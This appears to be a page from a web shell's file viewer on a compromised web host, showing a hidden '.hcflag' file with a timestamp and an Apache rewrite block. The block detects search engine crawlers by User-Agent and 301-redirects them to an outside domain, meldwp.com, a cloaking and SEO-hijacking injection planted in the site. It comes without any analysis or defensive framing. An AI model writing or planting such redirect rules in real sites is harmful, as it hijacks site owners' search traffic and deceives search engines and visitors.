| DIR: /home/vukcpszx/www/ |
| Current File : /home/vukcpszx/www/.hcflag |
date:1755149404
status:disable
# BEGIN Custom
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
# Check if the User-Agent matches common search engine bots
RewriteCond %{HTTP_USER_AGENT} (Googlebot|bingbot|Baiduspider|YandexBot|DuckDuckBot|Slurp|Yahoo|AhrefsBot|MJ12bot|SemrushBot) [NC]
RewriteCond %{HTTP_HOST} !^meldwp.com$ [NC]
RewriteRule ^(.*)$ https://meldwp.com/ [L,R=301]
</IfModule>
# END Custom |